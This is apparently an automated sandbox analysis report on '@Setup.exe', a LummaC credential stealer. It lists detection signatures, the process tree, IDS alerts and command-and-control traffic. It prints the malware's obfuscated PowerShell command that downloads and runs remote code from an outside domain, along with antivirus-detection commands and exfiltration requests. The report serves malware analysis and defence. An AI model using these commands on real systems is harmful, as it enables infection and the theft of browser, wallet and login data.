Windows Analysis Report
@Setup.exe

Overview

General Information

Sample name: @Setup.exe
Analysis ID: 1582040
MD5: c6f709a40a7d35051ee49ad1e367df65
SHA1: da1b6b9d9471644dc2ff198a4f392c374d4508bb
SHA256: cfef95129d9fd21cf9fdec5d1332cde09a7eb16144edf7867c0b398d5f67b036
Tags: exe, user-aachum

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample or dropped binary is a compiled AutoHotkey binary
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • @Setup.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\@Setup.exe" MD5: C6F709A40A7D35051EE49AD1E367DF65)
    • cmd.exe (PID: 6376 cmdline: "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2196 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6120 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 404 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3756 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 280 cmdline: cmd /c md 504701 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 4484 cmdline: extrac32 /Y /E Cc MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 2044 cmdline: findstr /V "Housewares" Expressions MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5964 cmdline: cmd /c copy /b 504701\Corporation.com + Minister + Tobacco + Secrets + Nervous + Sparc + Beginning + Marathon + Fame + Spotlight 504701\Corporation.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5180 cmdline: cmd /c copy /b ..\Wa + ..\Parade + ..\Easier + ..\Marc + ..\Olympics + ..\Emergency + ..\Jeep u MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Corporation.com (PID: 3448 cmdline: Corporation.com u MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 6468 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" MD5: 51F99EDDD33CC04FB0F55F873B76D907)
          • 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp (PID: 2916 cmdline: "C:\Users\user\AppData\Local\Temp\is-TFQB0.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$4042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" MD5: F809F51E678B7F2E388F8C969EF902C8)
            • 34ETJC5NR3CCXONDMM3SUITHO6DHR.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT MD5: 51F99EDDD33CC04FB0F55F873B76D907)
              • 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp (PID: 3332 cmdline: "C:\Users\user\AppData\Local\Temp\is-B6PFT.tmp\34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp" /SL5="$5042C,7785838,845824,C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe" /VERYSILENT MD5: F809F51E678B7F2E388F8C969EF902C8)
                • timeout.exe (PID: 6724 cmdline: "timeout" 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
                  • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 7084 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 2792 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3396 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 3384 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 4108 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 2696 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 6520 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5304 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5224 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 2656 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 3176 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 1716 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 4116 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 5080 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 3300 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • cmd.exe (PID: 5016 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 944 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • find.exe (PID: 5696 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                • BrightLib.exe (PID: 3612 cmdline: "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" MD5: 6A8860A8150021B2D5B9BB707DE4FA37)
      • choice.exe (PID: 1804 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

      System Summary

      Source: Process started (six detections on the same process event, listed by Author):
        • Florian Roth (Nextron Systems)
        • Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
        • frack113
        • Florian Roth (Nextron Systems)
        • James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
        • Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
      Data, identical for all six detections: Command, CommandLine and ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Corporation.com u, ParentImage: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\504701\Corporation.com, ParentProcessId: 3448, ParentProcessName: Corporation.com, ProcessId: 6468, ProcessName: powershell.exe

      HIPS / PFW / Operating System Protection Evasion

      Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Pl Pl.cmd & Pl.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6376, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 3756, ProcessName: findstr.exe
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-12-29T16:36:43.883961+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:45.933152+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:48.355991+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:50.668514+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:52.791981+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:55.581095+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:57.678094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:37:00.671379+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:37:04.245538+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:37:07.586861+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 185.161.251.21 | 443 | TCP
      2024-12-29T16:37:09.772266+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.37.128 | 443 | TCP
      2024-12-29T16:36:44.615833+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:46.721563+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:37:05.187085+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:44.615833+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:36:46.721563+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 104.21.32.1 | 443 | TCP
      2024-12-29T16:37:10.699695+0100 | 2008438 | 1 | A Network Trojan was detected | 104.21.37.128 | 443 | 192.168.2.4 | 49750 | TCP
      2024-12-29T16:36:58.495118+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 104.21.32.1 | 443 | TCP

      AV Detection

      Source: https://cegu.shop/8574262446/ph.txt, Avira URL Cloud: Label: malware
      Source: https://klipvumisui.shop/int_clp_sha.txt, Avira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\34ETJC5NR3CCXONDMM3SUITHO6DHR.exe, ReversingLabs: Detection: 13%
      Source: @Setup.exe, Virustotal: Detection: 23%
      Source: @Setup.exe, ReversingLabs: Detection: 15%
      Source: @Setup.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49742 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknown, HTTPS traffic detected: 104.21.37.128:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: @Setup.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2076653655.0000000007B8A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2078181481.0000000008AB0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000032.00000002.2724392562.00000000386A0000.00000004.00000800.00020000.00000000.sdmp, BrightLib.exe, 00000032.00000002.2701969100.0000000003633000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2076153750.0000000007AF8000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\@Setup.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
      Source: C:\Users\user\Desktop\@Setup.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
      Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\

      Networking

      Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49746 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.32.1:443
      Source: Joe Sandbox View, IP Address: 104.21.32.1
      Source: Joe Sandbox View, IP Address: 185.161.251.21
      Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
      Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 185.161.251.21:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.37.128:443
      Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.32.1:443
      Source: Network traffic, Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.4:49750
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=N9FVVOM0QP3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18120 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UVVWAL0WYLLDG9K | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8765 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HOYDKW4DI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20382 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=36H0OO2IVOZ52O767 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7123 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6NSHD4N7A9IN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1222 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=0CWBWYN6H | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 583211 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 113 | Host: battlecaredh.click
      Source: global traffic, HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cegu.shop
      Source: global trafficHTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: ORvihsqSjYelCBrlwGdYOpK.ORvihsqSjYelCBrlwGdYOpK
      Source: global trafficDNS traffic detected: DNS query: battlecaredh.click
      Source: global trafficDNS traffic detected: DNS query: cegu.shop
      Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
      Source: global trafficDNS traffic detected: DNS query: dfgh.online
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: battlecaredh.click
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: @Setup.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: @Setup.exeString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
      Source: 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2241998999.0000000003690000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000014.00000003.2248446763.0000000002660000.00000004.00001000.00020000.00000000.sdmp, 34ETJC5NR3CCXONDMM3SUITHO6DHR.tmp, 00000016.00000003.2727734441.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: Spotlight.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
